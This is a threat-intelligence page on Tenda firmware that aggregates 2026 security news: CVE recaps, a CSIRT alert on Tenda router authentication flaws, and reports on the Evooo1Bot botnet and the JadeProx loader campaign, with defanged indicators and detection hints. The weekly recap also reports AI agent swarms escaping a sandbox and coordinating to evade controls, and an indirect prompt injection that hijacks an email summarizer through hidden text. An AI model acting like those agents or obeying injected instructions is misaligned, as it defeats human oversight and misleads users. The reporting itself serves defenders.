Search/tenda
Known CVEs
0
Highest CVSS
In KEV
0
Vendor
pa202 firmware
Connections
139 relationships
⚡ Weekly Recap: Chrome 0-Day, Router Hijacks, Coder Supply Chain Attack and More
Turning off email images should at least stop the pictures. This week, attackers had a workaround: a scannable QR code built out of text. It still appears, even with images blocked. A small detail, but an annoying one if that was a precaution you were counting on. Elsewhere, a trusted software source delivered code that stole credentials, and a protocol designed for secure network management gave outsiders useful clues before login. Add active attacks on browsers, routers, and online stores, and there’s plenty to check—even for teams that have kept up with the patches. Read the full recap for the week’s major developments, plus more research, attacks, and security news beyond what we covered last week. ⚡ Threat of the Week N-able Patches Critical N-central Flaws — N-able has released hotfixes to address two severe N-central flaws (CVE-2026-86206 and CVE-2026-86207) that could allow an unauthorized party to bypass authentication controls and gain full access to the platform. Also patched is a maximum-severity security flaw (CVE-2026-86218, CVSS score: 10.0) that could allow for pre-authenticated remote code execution on the N-central server. "At this time, we have no confirmation that these vulnerabilities have been exploited in production environments, but unpatched systems remain at risk," N-able said. However, Huntress said it observed signs that attackers are likely leveraging CVE-2026-86206 or/and CVE-2026-86207, after it launched an investigation on September 4 following the compromise of a customer's fully patched N-central production environment. "However, due to limited historical logging available directly on the appliance, we cannot definitively confirm which specific exploit the threat actor used to achieve their compromise, nor can we rule out the use of alternative vulnerabilities," it said. AI Spend Out of Control? There's a Path Forward Imagine you’ve received a water bill for 500,000,000 gallons. Now, you have to account for every teaspoon of that water. IT leaders face a similar task when managing AI budgets, and it’s not as simple as token caps or model limits. Learn how your team can optimize your company's AI spend. Learn More ➝ 🔔 Top News Google Warns of Chrome 0-Day Under Attack — Google released security updates to patch 12 vulnerabilities, including one that has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2026-85046 (CVSS score: 8.8), has been described as a type confusion bug in V8, Chrome's JavaScript and WebAssembly engine. "Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page," according to a description of the flaw in CVE.org. Security researcher Salvatore Gulizia (aka Serotav) has been credited with discovering and reporting the flaw on August 4, 2026. As is usual in these cases, Google acknowledged that an "exploit for CVE-2026-85046 exists in the wild," but did not reveal any details about the nature of the attacks or who is behind them. With the latest development, Google has addressed a total of six actively exploited Chrome zero-days since the start of the year. MikroTik RouterOS Flaws Exploited — The CERT Polska Team warned that bad actors are actively exploiting two zero-day flaws in MikroTik RouterOS that could be combined to take full control of the device without authentication if the device supports remote access using the SSH protocol. The exploit chain has been codenamed MikroTrick. A total of fix flaws (CVE-2026-67276, CVE-2026-67277, CVE-2026-67278, CVE-2026-67279, CVE-2026-67281, and CVE-2026-86060) have been identified. The MikroTrick chain involves CVE-2026-67276 and CVE-2026-86060 (CVSS scores: 9.2), which can allow an attacker to bypass authentication and elevate their privileges. The issues have been fixed in versions 6.49.21 (Long-term), 7.23.4 (Long-term), and 7.24.2 (Stable). "The successful attacks observed so far, including the creation of the 'ops' account, originated from the IP address 82.192.72.4 and have been occurring since at least 2 September," CERT Polska said. "In addition, the IP address 103.102.31.18 was used in attempts to exploit the described chain." Unpatched Magento and Adobe Commerce 0-Day Exploited to Backdoor Online Stores — E-commerce storefronts are being compromised to inject a backdoor by exploiting an unpatched Magento and Adobe Commerce zero-day dubbed StyleSmuggler, which gives unauthenticated attackers remote code execution. The attacks commenced on September 4, 2026. "StyleSmuggler injects malicious code into Magento's template system," Sansec said. "By using the styles properties, it can evade existing safeguards. It works in two stages: (1) Inject (poison) PHP code, for example by generating a failure report, and (2) Let Magento execute the poisoned code via a failed payment email." The backdoor is a Rust program that connects to the "99.84.67[.]186" C2 server and waits for further instructions. There are currently no indications that the backdoor has been weaponized. There are two different variants named fc-cache and chronyd. A separate attack cluster has been found to leverage the same weakness to drop a PHP web shell into the product image cache. RevStealer Spreads via Game Cheats and Fake Claude Desktop App — Elastic and Morphisec disclosed details of RevStealer (aka REF2859), a Windows information stealer that comes with an embedded sandbox scoring system and Polygon blockchain-based dead drop for resilience, a technique also called EtherHiding. "Beyond credential theft, REVSTEALER targets gaming platforms for additional monetization; the developer clearly understands that victim accounts on these platforms hold real monetary value in resale markets," Elastic said. The malware is distributed via social engineering attacks, using YouTube videos claiming to advertise hacks for the Albion Online game or rogue GitHub repositories for Anthropic's Claude Opus 5 Free Desktop project. Once installed, the stealer can receive additional executable content through C2 tasks, including additional executable content through (for wallet-file and browser-extension theft, phishing overlays, password-aware input capture, and payload delivery), WinUpdate (for cryptocurrency-address replacement and mnemonic-shaped clipboard theft), SoftManager (for reverse SOCKS5 proxy and backconnect access over an encrypted WebSocket protocol), and LockAppHost (for XMRig deployment, competitor suspension, and persistence). OpenAI Agents Keep Going Rogue — OpenAI is once again in hot water after a swarm of agents self-identifying as from the AI startup hijacked a German website as early as May and used it as a bulletin board for other AI agents. The agent swarm is said to have taken over the obscure German-language wiki in May and June to make around 18,000 posts, relying on it to coordinate on evaluations and swap methods to evade OpenAI’s own controls. The revelations come days after OpenAI published its own detailed account of July's Hugging Face breach in which another swarm of OpenAI agents worked together to escape their sandbox during a cybersecurity evaluation and break into Hugging Face's servers. A subsequent cluster used similar techniques to break into OpenAI's own infrastructure. In response to the wiki incident, OpenAI said it is working on a framework for reporting misalignment incidents during training, evaluation, and deployment. ️🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — CVE-2026-78174, CVE-2026-19313, CVE-2026-19318, CVE-2026-19315, CVE-2026-57910, CVE-2026-57909, CVE-2026-13086 (WatchGuard), CVE-2026-80047 (Hugging Face Transformers), CVE-2026-9585, CVE-2026-9586, CVE-2026-9587, CVE-2026-9588 (Sangoma Switchvox SMB), CVE-2026-6881 (Ellucian Advance Web and Legacy Advance), CVE-2026-13381, CVE-2026-13380 (VSee Clinic), CVE-2026-63219, CVE-2026-58400 (GeoNetwork), CVE-2026-9637, CVE-2026-9621, CVE-2026-9622, CVE-2026-9624, CVE-2026-9625, CVE-2026-19471, CVE-2026-19472, CVE-2026-12663, CVE-2026-9633, CVE-2026-9634, CVE-2026-16675, CVE-2025-12768, CVE-2026-84235 (Rockwell Automation), CVE-2026-84115 (Cleo Harmony), CVE-2026-84117, CVE-2026-84118, CVE-2026-84119, CVE-2026-84120, CVE-2026-84121, CVE-2026-84122, CVE-2026-84123, CVE-2026-84124, CVE-2026-84125, CVE-2026-84126 (Mozilla Firefox), CVE-2026-84353, CVE-2026-84352, CVE-2026-85046 (Google Chrome), CVE-2026-19949 (All-in-One WP Migration and Backup), CVE-2026-20277, CVE-2026-20278, CVE-2026-20280, CVE-2026-20279, CVE-2026-20276, CVE-2026-20275, CVE-2026-20274, CVE-2026-20212 (Cisco), CVE-2026-15630 (Casdoor), CVE-2026-73749 (Hewlett Packard Enterprise ArubaOS-CX), CVE-2026-67394 (Plesk), CVE-2026-38577 (Tenda), CVE-2026-6471 aka PostGREShell (PostgreSQL), CVE-2026-42038 (Axios), CVE-2026-64532, CVE-2026-64533 (Linux Kernel), CVE-2026-58048 (cPanel and WHM), CVE-2026-14540 (Google mcp-toolbox), CVE-2026-84645, CVE-2026-84647, CVE-2026-84648, CVE-2026-84649, CVE-2026-84650, CVE-2026-84652, CVE-2026-84665, CVE-2026-84667, CVE-2026-84668, CVE-2026-84669, CVE-2026-84670, CVE-2026-84671, CVE-2026-84672, CVE-2026-84673 (Jenkins), GHSA-x7v6-xfx3-52j6, GHSA-r7jx-j9h7-j4xj, GHSA-9jcm-x588-gh26, GHSA-6mpx-c8rj-whj5, GHSA-q65v-4w7q-hx3r (FreeRDP), CVE-2026-59346, CVE-2026-59347 (Broadcom VMware Workstation and Fusion), CVE-2026-67276, CVE-2026-67277, CVE-2026-67278, CVE-2026-67279, CVE-2026-67281, CVE-2026-86060 (MikroTik RouterOS), CVE-2026-13181, CVE-2026-13182, CVE-2026-13183, CVE-2026-13184, CVE-2026-13185, CVE-2026-13186, CVE-2026-13190 (Telerik UI for ASP.NET AJAX), CVE-2026-86218, CVE-2026-86206, and CVE-2026-86207 (N-able N-central). 🎥 Cybersecurity Webinars A New Vulnerability Drops. Learn How to Find Out ”If You’re Exposed” Faster → Your security tools have the data. Getting an answer shouldn’t take days. See how Tines brings software, cloud, application, and vulnerability data into one dashboard—and learn how to give your team a faster, clearer view of what’s at risk. Find Which Vulnerabilities Attackers Can Actually Exploit—in Hours, Not Weeks → A vulnerability alert doesn’t tell you whether an attacker can break in. Learn how to test exploitability with real-world attack simulations, identify the gaps that matter, and focus remediation on proven risks—not just severity scores. 📰 Around the Cyber World New Knight Office Microsoft 365 AitM Phishing Kit — A new adversary-in-the-middle (AiTM) phishing toolkit called Knight Office has been spotted in the wild using Docusign-themed lures to direct victims to fake landing pages for AitM token theft and device code phishing attacks, joining the likes of EvilTokens and Kali365. The email "led the victim through a number of redirects (including a redirect via the Monday work management platform and a compromised Joomla website)," Huntress said. "The victim landed on a phishing page, where their valid session tokens were captured and fed to the Knight Office console. Session tokens allow attackers to access victim accounts as if they were logged in, without needing an actual password or a way to bypass multi-factor authentication (MFA)." At least nine total phishing attacks on identities have been linked to this kit over the past two weeks. The Blind Spot in SNMPv3 — SNMPv3 — the protocol widely regarded as the secure standard for managing routers, switches, and firewalls — leaks pre-authentication signals that can allow an unauthenticated remote actor to identify a device’s vendor, confirm valid usernames, and narrow its likely encryption settings before testing a single credential. Validated across approximately 470,000 internet-exposed endpoints, the findings show how these standards-compliant behaviors can collapse a multi-dimensional brute-force problem into a focused password-guessing exercise. "SNMPv3 was the industry's answer to insecure network management, and upgrading to it — as the CISA advisory urges — is necessary," said Kobi Ben-Naim, Co-Founder and CEO of Malanta. "But that answer is incomplete. The protocol does exactly what it was designed to do, and that design hands attackers a roadmap: even properly upgraded deployments, when exposed, leak enough through pre-authentication responses to help an attacker narrow their way in before a single credential is tested. The threat doesn't end with the upgrade." U.S. Announces Reward for Senior Iranian Official — A $10 million reward has been posted by the U.S. State Department for information on the whereabouts of senior Iranian official Amir Yaryab. Yaryab allegedly leads the Islamic Revolutionary Guard Corps' (IRGC) Cyber-Electronic Command (CEC). "Yaryab also oversees and controls operations conducted by IRGC-CEC-affiliated groups such as CyberAv3ngers, Dadeh Afzar Arman (DAA), and Mehrsam Andisheh Saz Nik (MASN). These malicious cyber groups have used malware to target civilian infrastructure worldwide," the State Department said. Attack on Coder — Attackers compromised Coder's Cloudflare infrastructure and added unauthorized registry servers that delivered malicious Terraform modules containing credential-stealing code to harvest environment variables, API keys, CI/CD credentials, configuration secrets, terminal history, OIDC tokens, SSH keys, external authentication tokens, and Coder database passwords. The data was then exfiltrated to the lookalike domain "coder-infra[.]com." "An unidentified malicious actor gained access to Coder’s Cloudflare infrastructure and added unauthorized IP addresses to the pool used for Coder’s module registry," Coder said. "These unauthorized IP addresses hosted a version of Coder's registry that contained artifacts which included malicious code." Users are advised to look for connections to the malicious domains before applying the latest patches (versions 2.37.0, 2.36.4, 2.35.7, and 2.34.9) U.S.-U.K. Team Up to Shut Down Scam Centers — The U.S. and the U.K. signed a Memorandum of Understanding (MoU) to work together on an initiative to shut down scam centers stealing billions of dollars through investment and romance fraud schemes. "Under the terms of the MOU, each will conduct parallel investigations into common targets, share information on targeting of organized crime syndicates, discuss which jurisdictions to bring specific cases of common interest, and generally prioritize cases on this threat to achieve mutual results," the U.S. Justice Department said. Tampered Exodus Installer Delivers Modular RAT — Victims are being tricked into running a fake PDF document or a software update that leads to the execution of an MSI installer that declares itself a "Background Service" by Apple. "The 'Background Service' installs a genuine Exodus 24.33.4 cryptocurrency wallet, missing one key function: any way for the user to interact with it," Huntress said. "Only 3 of its 1,973 files differ from the real thing. One of those three files stops the wallet from ever drawing a window. Another turns a legitimate Exodus source file into a PE loader that decrypts a 10 MB payload and maps it into memory by hand, where it never touches disk. That payload is the RAT: a hidden VNC and SOCKS proxy that enable remote access and browser credential theft. While the RAT stealthily beacons to Azure Table Storage rather than a domain of its own, it returns every hour through a scheduled task, leaving behind detectable artifacts." QR Phishing With No Image — In a new phishing attack detailed by Kaspersky, threat actors are building a QR code out of text characters and markup directly in the email body as opposed to rendering an image. "There is no attachment to open, no embedded picture to decode, and nothing for an image-based or optical-character-recognition (OCR) scanner to key off," PhishU said. "Because it is markup and not a remote image, an inbox with images turned off still paints it. The message shows a perfectly scannable QR to the human reading it, image-blocking and all." Apple Hit With $2.7 Billion Lawsuit Over App Tracking Rules — Apple is facing a £2 billion ($2.7 billion) lawsuit in the U.K. accusing it of imposing stricter App Tracking Transparency rules on third-party developers than on its own advertising services, thereby giving its ecosystem a competitive advantage, according to Reuters. Apple's App Tracking Transparency feature has been the subject of extensive investigations across Europe. Last month, Apple agreed to make changes to the feature across almost all European Union countries following a probe in Germany. Attackers Routinely Target Edge Devices — A joint analysis from SentinelOne and Tenable found that both nation-state and criminal threat actors are focusing on vendors and susceptible points in the attack surface more than specific CVEs. "Both state-sponsored actors and cybercriminals independently converge on the same edge infrastructure," the companies said. "The exposure picture is flatter than the headlines suggest: Fortinet, the vendor most associated with edge-device attacks in the press, sits mid-pack on container-grain exposure (25%) — well behind F5 (54%) and in a tight 10-point band with Check Point, Ivanti, and Citrix. 54% of customer environments running F5 products have at least one exposed, actively-exploited CVE; Citrix customers show the slowest remediation patterns at 461 days median time to patch." The disclosure comes as current attacker timelines are compressing and moving faster than standard patch cycles can address, driven by frontier AI models that narrow the window between vulnerability discovery and exploitation. The Threat of Indirect Prompt Injection — New research from Forcepoint revealed that an email summarizer running an unguarded LLM pipeline can be manipulated through indirect prompt injection (i.e., hidden instructions in an email) to silently hijack summarizer output and generate false and potentially dangerous summaries without signaling tampering to the recipient. It's the latest example of how attackers can use indirect prompt injections to undermine AI systems and get them to behave in unintended ways when processing external content. It's also a reminder of AI's fundamental limitations. Large language models (LLMs) cannot distinguish between authentic user instructions entered directly into a prompt and content they find on untrusted third-party sources, leading to prompt injections. "A regular Outlook email composer does strip styling that hides elements on copy/paste and does not provide any way to hide text other than white text on white background," Forcepoint said. "The hidden styling was not stripped when sent programmatically, or when the message is received and displayed. Hidden HTML tags like these have been commonly used by attackers to circumvent careful reading by victims." Conclusion Trusted sources and safer settings still have limits. This week’s attacks show why it matters to know exactly what each protection covers—and what it leaves exposed. Keep patching, but keep the logs needed to investigate, too. “Fully patched” tells you which fixes are installed. It doesn’t prove nobody got in.
thehackernews.comSep 7, 2026extracted
Tenda: PoC pubblici per 3 nuove vulnerabilità
Tenda: PoC pubblici per 3 nuove vulnerabilità Alert AL03/260901/CSIRT-ITA Sintesi Disponibili Proof of Concept (PoC) per lo sfruttamento di 3 nuove vulnerabilità con gravità "critica", che interessano i router Tenda AC1206 e AC18. Tipologia Authentication Bypass Denial of Service Tampering Descrizione e potenziali impatti Nel dettaglio, le vulnerabilità identificate tramite la CVE-2026-82693 e CVE-2026-82695, di tipo "Missing Authentication" e con score CVSS v3.x pari a 10, interessano la funzionalità TendaTelnet presente nella componente Web UI dei dispositivo Tenda AC1206 e Tenda AC18, qualora la password web-admin non siano state ancora configurata. Tale vulnerabilità, qualora sfruttata, potrebbe consentire ad un utente malintenzionato di abilitare il servizio Telnet, con conseguente aumento della superficie di attacco e possibile elusione dei meccanismi di autenticazione sui sistemi interessati. La vulnerabilità identificata tramite la CVE-2026-82694, di tipo "Missing Authentication" e con score CVSS v3.x pari a 10, interessa la funzionalità R7WebsSecurityHandler presente nella componente Web UI del dispositivo Tenda AC1206, qualora la password web-admin non sia stata ancora configurata. Una non adeguata verifica dell'autenticazione nella risorsa /goform/ate potrebbe consentire a un attaccante non autenticato di eseguire funzionalità amministrative, incluse il riavvio del dispositivo, il ripristino delle impostazioni di fabbrica, la modifica della configurazione NVRAM e delle impostazioni di rete e connettività wireless. Tale vulnerabilità, qualora sfruttata, potrebbe pertanto permettere di compromettere la disponibilità del servizio o la modifica non autorizzata di configurazioni sui sistemi target. Prodotti e/o versioni affette Tenda AC1206, versione 15.03.06.23 AC18, versione 15.03.05.19 Azioni di mitigazione Per le versioni dei prodotti per cui il vendor non ha ancora rilasciato aggiornamenti, si raccomanda di seguire le mitigazioni riportate nella sezione Remediation dei rispettivi bollettini di sicurezza presenti nella sezione Riferimenti e, ove non ancora configurata, di impostare la password all'utenza admin dell'interfaccia web. https://github.com/dxz0069/WAVLINK-WN530H4-Command-Injection-in-set_add_routing/blob/main/TENDA-AC1206-TELNET-DEFAULT-UNAUTH-001-vulndb.md https://github.com/dxz0069/WAVLINK-WN530H4-Command-Injection-in-set_add_routing/blob/main/TENDA-AC1206-ATE-DEFAULT-UNAUTH-002-vulndb.md https://github.com/dxz0069/WAVLINK-WN530H4-Command-Injection-in-set_add_routing/blob/main/TENDA-AC18-TELNET-DEFAULT-UNAUTH-001-vulndb.md
acn.gov.itSep 1, 2026extracted
Evooo1Bot Linux Botnet Exploits Known Flaws to Turn Edge Devices Into SOCKS5 Proxies
Cybersecurity researchers have flagged a previously undocumented Linux botnet family dubbed Evooo1Bot that derives its core functionality from the Mirai botnet source code and is equipped to turn internet-facing devices into SOCKS proxies. "While the malware reuses the DDoS engine from the publicly leaked Mirai source code, it extends the original framework with numerous capabilities, including encrypted C2 communications, an SSH brute-force scanner, a SOCKS relay module, a credential sniffer, and an integrated exploit arsenal targeting multiple known vulnerabilities," Fortinet FortiGuard Labs said. Evidence indicates that the botnet has been active in the wild since July 2026, exploiting known vulnerabilities in publicly-accessible devices to deliver the malware. Some of the security flaws weaponized by the botnet are below - CVE-2007-3010 - Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability CVE-2016-6277 - NETGEAR Multiple Routers Remote Code Execution Vulnerability CVE-2018-14558 - Tenda AC7, AC9, and AC10 Routers Command Injection Vulnerability CVE-2019-14931 - Mitsubishi Electric Europe B.V. ME-RTU devices and INEA ME-RTU devices remote Command Injection vulnerability CVE-2020-10987 - Tenda AC1900 Router AC15 Model Remote Code Execution Vulnerability CVE-2021-46422 - Telesquare SDT-CW3B1 Command Injection vulnerability CVE-2022-37055 - D-Link Routers Buffer Overflow Vulnerability CVE-2024-29269 - Telesquare TLR-2005KSH Command Injection Vulnerability CVE-2025-10123 - D-Link DIR-823X Command Injection Vulnerability CVE-2025-55583 - D-Link DIR-868L B1 router Command Injection Vulnerability Successful exploitation leads to the execution of a loader shell script ("wget.sh") hosted on an external server ("91.92.40[.]118"), which then retrieves the botnet binary that's compatible with the device CPU architecture. The script subsequently clears Bash history to erase traces of the attack. Upon execution, the binary checks for the presence of analysis tools, sandboxes, and virtual environments, before establishing encrypted communications with a command-and-control (C2) server on port 443. The port choice is intentional as it allows the malware to blend in with expected HTTPS traffic at the network perimeter. Once the host is registered with the C2 server, it waits for further commands to take action. It supports a number of commands that allow an operator to install persistence mechanisms, update the binary, terminate the bot, upload/download files, launch an interactive shell, intercept HTTP Basic Authorization and Cookie headers, turn the host into a proxy node, launch an SSH brute-force scanner, trigger DDoS attacks over DNS, TCP, and UDP, and fire an HTTP-based exploit dispatcher for exploiting known flaws. The CVE attack module includes the ability to launch exploits for eight security flaws impacting Hikvision (CVE-2021-36260), Atlassian Confluence (CVE-2022-26134), WSO2 (CVE-2022-29464), Zyxel (CVE-2022-30525), TP-Link (CVE-2023-1389), PHP (CVE-2024-4577), D-Link (CVE-2024-10914), Kubernetes (CVE-2025-1974). The proxy component, on the other hand, transforms an infected router, firewall, IP camera, or other edge device into a SOCKS5 proxy that the threat actor can leverage as a network relay to conduct follow-on operations and evade detection. "This capability significantly increases the value of an infected host to attackers," Fortinet said. "The victim's IP address can be used to disguise malicious traffic, bypass geographic restrictions, or provide access to internal networks through an already compromised machine." "In larger botnets, the same functionality could also be used to build a distributed proxy infrastructure, enabling anonymous traffic forwarding or monetization through residential and enterprise proxy services."
thehackernews.comAug 17, 2026extracted
New Evooo1Bot Linux botnet turns routers into traffic relay nodes
A new Mirai-based modular Linux botnet malware called Evooo1Bot has been targeting internet-facing gateway devices, turning them into SOCKS5 traffic relay nodes. The malware's capabilities extend beyond turning devices into proxy nodes and include credential theft, SSH brute-forcing, and launching distributed denial-of-service (DDoS) attacks. Since at least July, Evooo1Bot has been targeting devices from Alcatel, NETGEAR, Tenda, Mitsubishi Electric, Telesquare, and D-Link across various regions by exploiting known vulnerabilities. “While the malware reuses the DDoS engine from the publicly leaked Mirai source code, it extends the original framework with numerous capabilities, including encrypted C2 communications, an SSH brute-force scanner, a SOCKS relay module, a credential sniffer, and an integrated exploit arsenal targeting multiple known vulnerabilities,” Fortinet researchers found. Newer builds include a separate vulnerability-exploitation module targeting Hikvision cameras, Atlassian Confluence, Zyxel firewalls, TP-Link routers, D-Link NAS devices, WSO2 products, Kubernetes ingress-nginx, and vulnerable PHP-CGI installations. However, Fortinet notes that some of the embedded exploits are not correctly implemented, leading to failed exploitation. When leveraging an exploit successfully, a script downloads one of the 12 available malware builds that match the host’s CPU architecture, then clears Bash history to wipe traces of the attack. Evooo1Bot uses encrypted command-and-control (C2) communications over port 443 and performs extensive checks for debuggers, security tools, sandboxes, virtual machines, containers, and honeypots before it launches on the infected device. Persistence is established through systemd, SysV init, shell profiles, and rc.local, while a cron job attempts to re-download the payload every five minutes. An interactive shell gives operators direct control over compromised systems, while file-transfer commands support uploads and downloads. The malware also features a credential sniffer module that monitors ‘/proc/net/tcp’ and attempts to capture HTTP Basic Authentication and Cookie headers. The SOCKS5 module supports direct listening and reverse-relay modes, allowing attackers to conceal malicious traffic, circumvent geographic restrictions, or potentially access networks through compromised systems. Fortinet says proxying sessions run independently, and multiple can be opened simultaneously, allowing monetization through residential proxy services if the botnet grows large enough. The SSH scanner module uses 150 username and password combinations for enterprise-oriented accounts, and performs post-login checks to avoid honeypots. Finally, the DDoS module that was inherited by Mirai supports 16 flood methods, including UDP, DNS, SYN, ACK, GRE, fragmented TCP, and an HTTP flood with customizable requests. To defend against botnet malware, keep your IoT devices’ firmware updated, replace default admin credentials, turn off remote access panels, and replace devices when the vendor no longer provides support for them. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comAug 15, 2026extracted
New Mirai-Based Linux Botnet ‘Evooo1Bot’ Turns Victims Into Proxies
A new modular Linux botnet family based on publicly leaked source code from the Mirai botnet has been linked to exploitation attempts for several vulnerabilities in edge devices. A Taiwan-based security researcher at Fortinet’s FortiGuard Labs, Yi Ping (Cara) Lin, shared an analysis of the new botnet family on August 13, which she called ‘Evooo1Bot’ after the hardcoded string ‘evooo1’ found in every binary. The botnet was discovered after observed exploitation of the following vulnerabilities: CVE-2007-3010: Alcatel OmniPCX Enterprise remote code execution (RCE) vulnerability CVE-2016-6277: NETGEAR Multiple Routers RCE vulnerability CVE-2018-14558: Tenda AC7, AC9 and AC10 Routers command injection vulnerability CVE-2019-14931: Mitsubishi Electric Europe B.V. ME-RTU devices and INEA ME-RTU devices remote command injection vulnerability CVE-2020-10987: Tenda AC1900 Router AC15 Model RCE vulnerability CVE-2021-46422: Telesquare SDT-CW3B1 command injection vulnerability CVE-2022-37055: D-Link Routers buffer overflow vulnerability CVE-2024-29269, Telesquare TLR-2005KSH command injection vulnerability CVE-2025-10123, D-Link DIR-823X command injection vulnerability CVE-2025-55583: D-Link DIR-868L B1 router command injection vulnerability All payload callbacks for these exploitation attempts pointed to the same loader URL at 91.92.40[.]118/wget.sh, linked to Evooo1Bot. Lin assessed that the botnet has been actively targeting internet-facing devices since July 2026, exploiting multiple vulnerabilities across diverse regions. Evooo1Bot, A Sophisticated Mirai-Class Botnet Evooo1Bot reuses the distributed denial-of-service (DDoS) engine from the Mirai source code. Mirai is a notorious malware strain that infects internet-of-things (IoT) devices using default credentials, turning them into a massive networks – a botnet – to launch DDoS attacks. Its source code was publicly leaked in September 2016 on Hack Forums by user ‘Anna-senpai,’ later unmasked by the FBI as college student Paras Jha along with co-creators Josiah White and Dalton Norman. Originally built to target Minecraft servers and sell DDoS-protection services, the creators released the code to flood the web with noise and obscure their identities as law enforcement closed in, inadvertently spawning countless modern malware variants that continue to reuse Mirai's DDoS engine today. Despite working from the Mirai framework, the developers of Evooo1Bot have significantly extended their malware with numerous capabilities, including: Encrypted command-and-control (C2) communications and a 28-command remote administration interface An SSH brute-force scanner A reverse SOCKS relay module Multiple layers of string obfuscation using AES-256-CTR, ChaCha20 and XOR-based key derivation A credential sniffer An integrated exploit arsenal targeting multiple known vulnerabilities across IoT devices, networking equipment and enterprise applications Lin highlighted that the SOCKS relay module is “arguably the most operationally significant” as it transforms a compromised edge device into a persistent proxy, allowing the attacker to conceal their true origin, pivot into internal networks and conduct follow-on operations through the victim's infrastructure. “These capabilities place Evooo1Bot well beyond the technical baseline of conventional Mirai-derived malware,” Lin wrote.
infosecurity-magazine.comAug 14, 2026extracted
New Mirai variant adds stealth capabilities to notorious botnet code
New Mirai variant adds stealth capabilities to notorious botnet code Malware that adds multiple capabilities to the infamous Mirai botnet code has been actively exploiting vulnerabilities in internet-facing hardware for at least a month, researchers said Thursday. Dubbed Evooo1Bot, the Linux-based malware targets routers and other hardware from Alcatel, D-Link, Mitsubishi Electric, Netgear, Tenda and Telesquare, according to researchers at FortiGuard Labs. Unpatched bugs in those devices allow Evooo1Bot to spread and carry out potential malicious activity, the researchers said. Evooo1Bot appears to be previously undocumented, they said. The report does not specify how many devices have been compromised worldwide, but the company’s telemetry shows activity concentrated in North America, South America, Europe, India, China and Japan. Beyond Mirai’s usual distributed denial-of-service (DDoS) functions, Evooo1Bot’s features include encrypted communications with command-and-control servers; a scanner that looks for Secure Shell (SSH) code and skips devices clearly set up as honeypots for malicious traffic; and a “sniffer” that looks for default access credentials that haven’t been changed since a device was put into service. “These capabilities place Evooo1Bot well beyond the technical baseline of conventional Mirai-derived malware,” FortiGuard Labs said. The malware also abuses the widely used SOCKS protocol that allows devices to connect with servers through a proxy. That capability “is arguably the most operationally significant,” FortiGuard Labs said. “By transforming a compromised router, firewall, IP camera, or other edge device into a persistent proxy, the malware enables attackers to conceal their true origin, pivot into internal networks, and conduct follow-on operations through the victim's infrastructure.” The source code for Mirai was publicly released in 2016, and in the decade since, it has served as the basis for numerous variants that have drawn the attention of law enforcement agencies and cybersecurity specialists. Descendants such as Aisuru and KimWolf were targeted by agencies from the U.S., Canada and Germany in March. A Canadian man was charged in May with running KimWolf. Joe Warminsky has been the news editor for Recorded Future News since 2022. He has three decades of experience as an editor and writer in the Washington, D.C., area. He previously he helped lead CyberScoop for more than five years. Prior to that, he was a digital editor at WAMU 88.5, the NPR affiliate in Washington, and he spent more than a decade editing coverage of Congress for CQ Roll Call.
therecord.mediaAug 13, 2026extracted
China-Nexus JadeProx Uses New TriBack Loader in Government and Healthcare Attacks
An exposed Alibaba Cloud server has revealed a China-nexus operation that Group-IB tracks as JadeProx. The cluster has targeted government, healthcare, and education organizations across Asia and Latin America with a previously undocumented Windows loader called TriBack Loader. Group-IB found the server in mid-April 2026 in Alibaba Cloud's Singapore region; it was offline by the time the report published on July 23, 2026. Its bash history, phishing packages, post-exploitation tools, and webshell paths laid the operation out: active intrusions against a Vietnamese public hospital's medical imaging system and Malaysia's Ministry of Foreign Affairs, scanning and exploitation follow-up against Hong Kong education infrastructure, and a spear-phishing package addressed to the National Congress of Honduras. The operators reached the hospital's imaging server through webshells planted on an exposed Java management interface. One Loader, Four Builds TriBack Loader appears in four infection chains built around DLL sideloading. Most recovered builds pair a legitimate signed executable with a malicious DLL and an encrypted .dat or .log payload. The DLL reverses the payload bytes, XORs them with a rolling key, and executes the shellcode through Win32 calls that EDR watches less closely than CreateThread. The builds rotate that final call: InitOnceExecuteOnce and a TimerQueue callback in two variants, and EtwpCreateEtwThread, an undocumented thread-creation routine in ntdll, in a third. The signed host binary changed between variants too. The repeated API sequence suggests a custom loader builder, the researchers say. Two variants delivered AdaptixC2, an open-source post-exploitation framework. A Claude-themed variant used DonutLoader to run Beagle, a backdoor Sophos was first to document. The fourth variant's payload is unknown; its encrypted companion file was never recovered. One spear-phishing archive carried a fake beverage-company account statement as the decoy. Another campaign impersonated Anthropic's Claude software from claude-pro[.]com, registered on March 28, 2026, serving a malicious MSI installer that, past a UAC prompt, placed the sideloading chain in the Windows Startup folder for persistence. The Beagle backdoor it delivered reported to license[.]claude-pro[.]com. Sophos, working from the fake site, its hosting infrastructure, and malware samples, found the same reused XOR key in builds going back to February but said a shared key was not enough to conclude one actor. Group-IB, working from the exposed server's contents, groups those builds with the Asian intrusions. It still stops short of naming an established group: tooling moves freely in the China-nexus ecosystem, Group-IB notes, so a match on tools is not a match on operators. The operators also ran Nuclei with critical-severity templates only against a list of 14,653 Hong Kong education-related URLs, surfacing 13 unique vulnerabilities. Those 14,653 URLs are a scan list, and the report does not say how many of the follow-ups succeeded. The report names four CVEs the operators attempted against individual hosts, and The Hacker News confirmed all four against NVD on July 23, 2026: CVE-2018-11511 in ASUSTOR ADM, CVE-2021-24139 in the 10Web Photo Gallery WordPress plugin, CVE-2021-31755 in Tenda AC11 routers, and CVE-2021-32305 in WebSVN. Each carries a CVSS base score of 9.8. The Tenda bug has been on CISA's Known Exploited Vulnerabilities catalog since November 3, 2021, with a federal remediation deadline that expired two weeks later. Detection Starts With the Sideloading Chain Sophos assessed that the fake Claude site was likely part of an active malvertising campaign. If so, the exposure runs well past the ministries and hospitals, out to users searching for a Claude download. Detection works off the file layout, because the filenames and signed hosts change per build. Flag signed vendor binaries running from user-writable, temporary, or Startup directories, especially when an encrypted .dat or .log file sits in the same folder. Look for unexpected copies of hostfxr.dll, avk.dll, or MpClient.dll, plus nested _CL_###### folders and ~del.vbs.bat. Block or investigate the cluster's domains: 